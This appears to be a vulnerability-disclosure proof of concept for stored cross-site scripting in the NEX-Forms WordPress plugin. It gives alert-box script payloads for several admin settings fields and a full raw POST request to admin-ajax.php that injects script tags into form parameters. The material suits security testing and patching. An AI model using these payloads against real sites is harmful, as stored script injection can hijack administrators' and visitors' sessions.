Share
## https://sploitus.com/exploit?id=WPEX-ID:ECA883D8-9499-4DBD-8FE1-4447FC2CA28A
In Global Setting > Preferences > Validation, put the following payload in the Required Field, Incorrect Email, Incorrect URL or Alphabetical settings: "><script>alert(/XSS/)</script>
In Global Setting > Preferences > Emails > Email Autoresponder (User emails) > Subject setting: "><script>alert(/XSS/)</script>

The XSS will be triggered when viewing the NEX-Forms dashboard (/wp-admin/admin.php?page=nex-forms-dashboard)


Create a new form, add a Name field and put the following payload as the Field Label Text: "><script>alert(/XSS/)</script>

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6228
Connection: close
Cookie: [admin+]

action=nf_update_record&table=wap_nex_forms&edit_Id=2&plugin=shared&title=aa&form_fields=<script>alert(/XSS-form_fields/)</script>&clean_html=dummy&is_form=1&is_template=0&post_type=POST&post_action=ajax&custom_url=&mail_to=admin%40localhost.org&from_address=admin%40localhost.org&from_name=WP&on_screen_confirmation_message=dummy&on_screen_confirmation_message_admin=<script>alert(/XSS-on_screen_confirmation_message_admin/)</script>&google_analytics_conversion_code=&confirmation_page=&user_email_field=&confirmation_mail_subject=WP+-+NEX-Forms+Submission&user_confirmation_mail_subject=WP+-+NEX-Forms+Submission%5C&confirmation_mail_body=Thank+you+for+connecting+with+us.+We+will+respond+to+you+shortly.&on_form_submission=message&form_hidden_fields=&hidden_fields=&conditional_logic=&conditional_logic_array=&admin_email_body=%7B%7Bnf_form_data%7D%7D&bcc=&bcc_user_mail=&custom_css=&form_type=&draft_Id=0&products=&currency_code=USD&email_on_payment_success=&cmd=_cart&lc=US&mc_field_map=&gr_field_map=&mp_field_map=&ms_field_map=&email_subscription=&attach_pdf_to_email=&form_to_post_map=&md_theme%5B0%5D%5Btheme_name%5D=default&md_theme%5B0%5D%5Btheme_shade%5D=light&md_theme%5B0%5D%5Boverall_font%5D=&md_theme%5B0%5D%5Bfield_spacing%5D=15&md_theme%5B0%5D%5Boverall_label_font%5D=&md_theme%5B0%5D%5Boverall_label_font_size%5D=13&md_theme%5B0%5D%5Boverall_label_align%5D=left&md_theme%5B0%5D%5Boverall_label_color%5D=%239e9e9e&md_theme%5B0%5D%5Boverall_label_bold%5D=bold&md_theme%5B0%5D%5Boverall_label_italic%5D=not-italic&md_theme%5B0%5D%5Boverall_label_underline%5D=not-underline&md_theme%5B0%5D%5Boverall_input_font%5D=&md_theme%5B0%5D%5Boverall_input_font_size%5D=13&md_theme%5B0%5D%5Boverall_input_align%5D=left&md_theme%5B0%5D%5Boverall_input_color%5D=%239e9e9e&md_theme%5B0%5D%5Boverall_input_bg_color%5D=white&md_theme%5B0%5D%5Boverall_input_border_color%5D=%23dddddd&md_theme%5B0%5D%5Boverall_input_bold%5D=0&md_theme%5B0%5D%5Boverall_input_italic%5D=0&md_theme%5B0%5D%5Boverall_input_underline%5D=0&md_theme%5B0%5D%5Boverall_field_corners%5D=normal&md_theme%5B0%5D%5Boverall_icon_font_size%5D=17&md_theme%5B0%5D%5Boverall_icon_color%5D=%23888888&md_theme%5B0%5D%5Boverall_icon_bg_color%5D=white&md_theme%5B0%5D%5Boverall_icon_border_color%5D=%23dddddd&md_theme%5B0%5D%5Boverall_field_errors%5D=modern&md_theme%5B0%5D%5Boverall_field_errors_pos%5D=right&md_theme%5B0%5D%5Bmsg_hide_form%5D=yes&md_theme%5B0%5D%5Bmsg_position%5D=top&md_theme%5B0%5D%5Bmsg_placement%5D=outside&md_theme%5B0%5D%5Bloader_type%5D=ellipsis&md_theme%5B0%5D%5Bloader_color%5D=%2340C4FF&form_theme=bootstrap&jq_theme=default&form_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&msg_style=background%3A+%23fff%3B+box-shadow%3A+rgba(0%2C+0%2C+0%2C+0.2)+0px+7px+16px+0px%3B+border-radius%3A+4px%3B+padding%3A+30px%3B+border-color%3A%23ddd%3B&multistep_settings%5B0%5D%5Bmulti_step_total%5D=0&multistep_settings%5B0%5D%5Bmulti_step_stepping%5D=&multistep_settings%5B0%5D%5Bmulti_step_transition_in%5D=fadeIn&multistep_settings%5B0%5D%5Bmulti_step_transition_out%5D=fadeOut&multistep_settings%5B0%5D%5Bmulti_step_back_disabled%5D=no&multistep_settings%5B0%5D%5Bbreadcrumb_list%5D=%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%09&multistep_settings%5B0%5D%5Bbreadcrumb_type%5D=pilled&multistep_settings%5B0%5D%5Btext_pos%5D=text-bottom&multistep_settings%5B0%5D%5Bcrumb_align%5D=align_left&multistep_settings%5B0%5D%5Bbc_position%5D=top&multistep_settings%5B0%5D%5Bdata_theme%5D=default&multistep_settings%5B0%5D%5Bshow_front_end%5D=yes&multistep_settings%5B0%5D%5Bshow_inside%5D=no&multistep_settings%5B0%5D%5Bscroll_to_top%5D=yes&multistep_settings%5B0%5D%5Bform_width_pixels%5D=950&multistep_settings%5B0%5D%5Bform_width_percentage%5D=100&multistep_settings%5B0%5D%5Bform_width_unit%5D=%25&multistep_settings%5B0%5D%5Bmsg_width_pixels%5D=950&multistep_settings%5B0%5D%5Bmsg_width_percentage%5D=100&multistep_settings%5B0%5D%5Bmsg_width_unit%5D=%25&multistep_settings%5B0%5D%5Bbc_gutter%5D=20&multistep_settings%5B0%5D%5Bbc_folded%5D=bc-unfolded&multistep_settings%5B0%5D%5Bbc_connected%5D=bc-connected&multistep_settings%5B0%5D%5Bbc_style%5D=bc-solid&multistep_settings%5B0%5D%5Bbc_css%5D=&multistep_settings%5B0%5D%5Bbc_converted%5D=1&multistep_settings%5B0%5D%5Badd_timer%5D=no&multistep_settings%5B0%5D%5Btimer_add_to%5D=header&multistep_settings%5B0%5D%5Btimer_type%5D=overall&multistep_settings%5B0%5D%5Benabled_units%5D=minutes%2Cseconds&multistep_settings%5B0%5D%5Btimer_size%5D=small&multistep_settings%5B0%5D%5Btimer_position%5D=timer_inline&multistep_settings%5B0%5D%5Btimer_align%5D=timer_right&multistep_settings%5B0%5D%5Btimer_animation%5D=smooth&multistep_settings%5B0%5D%5Btimer_hours%5D=0&multistep_settings%5B0%5D%5Btimer_minutes%5D=0&multistep_settings%5B0%5D%5Btimer_seconds%5D=30&multistep_settings%5B0%5D%5Btimer_hours_label%5D=&multistep_settings%5B0%5D%5Btimer_minutes_label%5D=&multistep_settings%5B0%5D%5Btimer_seconds_label%5D=&multistep_settings%5B0%5D%5Btimer_hours_color%5D=%232979ff&multistep_settings%5B0%5D%5Btimer_minutes_color%5D=%2300bcd4&multistep_settings%5B0%5D%5Btimer_seconds_color%5D=%2340c4ff&multistep_settings%5B0%5D%5Btimer_direction%5D=clockwise&multistep_settings%5B0%5D%5Btimer_wrapper_css%5D=&multistep_settings%5B0%5D%5Btimer_text_color%5D=%23888888&multistep_settings%5B0%5D%5Btimer_inner_circle_color%5D=%23aaaaaa&multistep_settings%5B0%5D%5Btimer_bg_width%5D=0.1&multistep_settings%5B0%5D%5Btimer_fg_width%5D=0.05&multistep_settings%5B0%5D%5Btimer_start%5D=1&multistep_settings%5B0%5D%5Btimer_end%5D=0&multistep_html=dummy&upload_settings%5B0%5D%5Bupload_to_server%5D=true&attachment_settings%5B0%5D%5Battach_to_admin_email%5D=true&option_settings%5B0%5D%5Bsave_form_progress%5D=false&option_settings%5B0%5D%5Bsubmit_limit%5D=&option_settings%5B0%5D%5Bsubmit_limit_msg%5D=&option_settings%5B0%5D%5Bsend_admin_email%5D=true&option_settings%5B0%5D%5Bbefore_submit_js%5D=return+true%3B&option_settings%5B0%5D%5Bafter_submit_js%5D=return+true%3B